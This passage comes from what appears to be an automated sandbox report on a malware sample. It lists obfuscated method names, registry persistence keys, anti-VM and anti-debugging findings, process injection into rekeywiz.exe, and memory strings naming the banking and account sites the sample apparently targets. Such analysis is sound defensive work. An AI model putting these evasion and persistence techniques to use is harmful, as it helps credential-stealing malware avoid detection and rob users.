                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, Dx4dB5CEn8vwGTyGrCF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WLlZFMoGEO', 'ihAZjPqag8', 'WtcZHjHvPm', 'BcwZ1vryLt', 'VsrZfKVOwe', 'kJRZ3gFRsK', 'b7RZ0ZWSjQ'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, CwvslA1D3mHjdbj94M.csHigh entropy of concatenated method names: 'nN8cewlN03', 'IQLcjORYYa', 'EHSc1460Oa', 'pCecfYdsMS', 'Jk0cxl9xjb', 'Wlic2mwI7r', 'r7EcrcSA12', 'fnrckQOLv0', 'fevcJgP8ld', 'RYYc6ThvtM'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, JYZneE9EP4WfL3UV5D.csHigh entropy of concatenated method names: 'abxCtIvUIG', 'htoCdKEhgi', 'kcfClsTi2H', 'jCTCP0R8vq', 'zK3CcC6hVw', 'AU9CSTwtG7', 'lP1nsaCTDtDqCJgv11', 'CSRXB2E5iMCiu5iNcX', 'IWGCCD3QHS', 'grhCpdXYSn'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, HIvUIGsYtoKEhgiL61.csHigh entropy of concatenated method names: 'ekvG1PZREv', 'B5fGfKfZh4', 'y3TG3K2J3L', 'nnmG0wIQ63', 'FqkG5EKu6l', 'cnuGhoQkqp', 'Ha7GVwBEBZ', 'GWYGKr6V5E', 'HOcG7L7WoF', 'qOIGnKmfPK'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, CoX7ZAXpF44mX8ulGB.csHigh entropy of concatenated method names: 'xsI80J3N9', 'cgRBM1hFD', 'jMHqdixM5', 'zm5QEZW3m', 'Mws4lVQnY', 'jGvaYqUYq', 'ciQrXkyUwB0S8Tknbv', 'i8Cv4tUQnK95Vcdi0a', 'uQ1oVEAkC', 'ga9Ze6DMp'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, MrsB28C9bcheL28AxTi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eHXLu37Pnr', 'suyLZZ2MFL', 'WNSLUHjjHL', 'ohiLL6fsUi', 'A37LAuGnAG', 'S1KLRcXC0s', 'xCDLyZKyqP'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, w5Ne2hCClw4dP60bkGD.csHigh entropy of concatenated method names: 'Jb4ZnhSwwB', 'VOJZzsAJSd', 'WWCUErS254', 'QinUCnBGFf', 'vkxUXSpoxR', 'F1YUp9b9Ts', 'ekhU9xhMMZ', 'WatUibgYVQ', 'WkfUIk3oB7', 'EGnUG04RiE'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, cLNuiPVbRRG2MG0DDf.csHigh entropy of concatenated method names: 'LUTucOXgde', 'v3buNOAwdS', 'qknuuPeB20', 'gL4uUFdYHo', 'IjbuAeBdf2', 'n5ruyRIFVr', 'Dispose', 'u1eoIhDQpO', 'WaRoGWQSAJ', 'Nf6oYjSR5o'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, A36Bdp3IuUQBHnPdfy.csHigh entropy of concatenated method names: 'ToString', 'RjoSF9Z5mL', 'BoOSxMBFNG', 'ziSS2y4tWe', 'uNKSrLpouV', 'LbYSk8BeOT', 'rIaSJii8kQ', 'uMJS6ePqK8', 'uf2ST1Jhol', 't88SW6YjpD'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, gISZdE7NuLGVRKBCTG.csHigh entropy of concatenated method names: 'EtxuOsVFgw', 'OmSuxfCmEQ', 'VGju2q8b0b', 'uTqurVwSwE', 'tXnukHhuCp', 'O2ouJ74jyo', 'svfu6tZXqe', 'wiEuT2kpXg', 'MeRuWIIUXX', 'x5GueirbwC'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, Lp4sOqGdDtUBIwcAXm.csHigh entropy of concatenated method names: 'Dispose', 'vG2C7MG0DD', 'GXXXxe24QU', 'vrJk5f8jPE', 'SOqCnLWyPV', 'bmaCzce1FR', 'ProcessDialogKey', 'yGYXEISZdE', 'quLXCGVRKB', 'bTGXXh3ToY'
                Source: C:\Users\user\Desktop\hh01FRs81x.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: hh01FRs81x.exe PID: 7132, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: 8C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: 2420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: 9AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: AAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMemory allocated: BAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017321AE rdtsc 4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeWindow / User API: threadDelayed 3057Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeWindow / User API: threadDelayed 6915Jump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\rekeywiz.exeAPI coverage: 3.0 %
                Source: C:\Users\user\Desktop\hh01FRs81x.exe TID: 6324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532Thread sleep count: 3057 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532Thread sleep time: -6114000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532Thread sleep count: 6915 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exe TID: 3532Thread sleep time: -13830000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe TID: 1420Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rekeywiz.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006EC780 FindFirstFileW,FindNextFileW,FindClose,7_2_006EC780
                Source: C:\Users\user\Desktop\hh01FRs81x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 4Fr641e5.7.drBinary or memory string: global block list test formVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir*Hyper-V Dynamic Memory Integration Service
                Source: firefox.exe, 0000000F.00000002.1615012169.0000017B6C24D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLLo
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                Source: 4Fr641e5.7.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 4Fr641e5.7.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir!Hyper-V Virtual Machine Bus Pipes
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir!Hyper-V Hypervisor Root Partition
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 4Fr641e5.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 4Fr641e5.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                Source: 4Fr641e5.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 4Fr641e5.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 4Fr641e5.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dsrdspodmyaiqki Bus Pipes
                Source: 4Fr641e5.7.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 4Fr641e5.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.955797478.0000000004E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor|
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 4Fr641e5.7.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir$Hyper-V Hypervisor Logical Processor
                Source: 4Fr641e5.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 4Fr641e5.7.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 4Fr641e5.7.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Servicel
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 4Fr641e5.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 4Fr641e5.7.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: hh01FRs81x.exe, 00000000.00000002.955797478.0000000004E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid PartitionN
                Source: 4Fr641e5.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: rekeywiz.exe, 00000007.00000002.3334449717.00000000007F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+'
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000002.3335601480.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4Fr641e5.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 4Fr641e5.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.955838120.0000000004EA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                Source: 4Fr641e5.7.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 4Fr641e5.7.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 4Fr641e5.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Ir)Hyper-V Hypervisor Root Virtual Processor
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.0000000000A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dsrdspodmyaiqki Bus
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                Source: 4Fr641e5.7.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 4Fr641e5.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 4Fr641e5.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017321AE rdtsc 4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00417BB3 LdrLoadDll,4_2_00417BB3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734164 mov eax, dword ptr fs:[00000030h]4_2_01734164
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734164 mov eax, dword ptr fs:[00000030h]4_2_01734164
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F4144 mov eax, dword ptr fs:[00000030h]4_2_016F4144
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F4144 mov eax, dword ptr fs:[00000030h]4_2_016F4144
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F4144 mov ecx, dword ptr fs:[00000030h]4_2_016F4144
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F4144 mov eax, dword ptr fs:[00000030h]4_2_016F4144
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F4144 mov eax, dword ptr fs:[00000030h]4_2_016F4144
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666154 mov eax, dword ptr fs:[00000030h]4_2_01666154
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666154 mov eax, dword ptr fs:[00000030h]4_2_01666154
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165C156 mov eax, dword ptr fs:[00000030h]4_2_0165C156
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F8158 mov eax, dword ptr fs:[00000030h]4_2_016F8158
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690124 mov eax, dword ptr fs:[00000030h]4_2_01690124
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01720115 mov eax, dword ptr fs:[00000030h]4_2_01720115
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170A118 mov ecx, dword ptr fs:[00000030h]4_2_0170A118
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170A118 mov eax, dword ptr fs:[00000030h]4_2_0170A118
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170A118 mov eax, dword ptr fs:[00000030h]4_2_0170A118
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170A118 mov eax, dword ptr fs:[00000030h]4_2_0170A118
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov ecx, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov ecx, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov ecx, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov eax, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170E10E mov ecx, dword ptr fs:[00000030h]4_2_0170E10E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016901F8 mov eax, dword ptr fs:[00000030h]4_2_016901F8
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017361E5 mov eax, dword ptr fs:[00000030h]4_2_017361E5
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017261C3 mov eax, dword ptr fs:[00000030h]4_2_017261C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017261C3 mov eax, dword ptr fs:[00000030h]4_2_017261C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE1D0 mov eax, dword ptr fs:[00000030h]4_2_016DE1D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE1D0 mov eax, dword ptr fs:[00000030h]4_2_016DE1D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE1D0 mov ecx, dword ptr fs:[00000030h]4_2_016DE1D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE1D0 mov eax, dword ptr fs:[00000030h]4_2_016DE1D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE1D0 mov eax, dword ptr fs:[00000030h]4_2_016DE1D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017321AE mov eax, dword ptr fs:[00000030h]4_2_017321AE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A0185 mov eax, dword ptr fs:[00000030h]4_2_016A0185
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704180 mov eax, dword ptr fs:[00000030h]4_2_01704180
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704180 mov eax, dword ptr fs:[00000030h]4_2_01704180
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E019F mov eax, dword ptr fs:[00000030h]4_2_016E019F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E019F mov eax, dword ptr fs:[00000030h]4_2_016E019F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E019F mov eax, dword ptr fs:[00000030h]4_2_016E019F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E019F mov eax, dword ptr fs:[00000030h]4_2_016E019F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165A197 mov eax, dword ptr fs:[00000030h]4_2_0165A197
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165A197 mov eax, dword ptr fs:[00000030h]4_2_0165A197
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165A197 mov eax, dword ptr fs:[00000030h]4_2_0165A197
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171C188 mov eax, dword ptr fs:[00000030h]4_2_0171C188
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171C188 mov eax, dword ptr fs:[00000030h]4_2_0171C188
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168C073 mov eax, dword ptr fs:[00000030h]4_2_0168C073
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01662050 mov eax, dword ptr fs:[00000030h]4_2_01662050
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E6050 mov eax, dword ptr fs:[00000030h]4_2_016E6050
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165A020 mov eax, dword ptr fs:[00000030h]4_2_0165A020
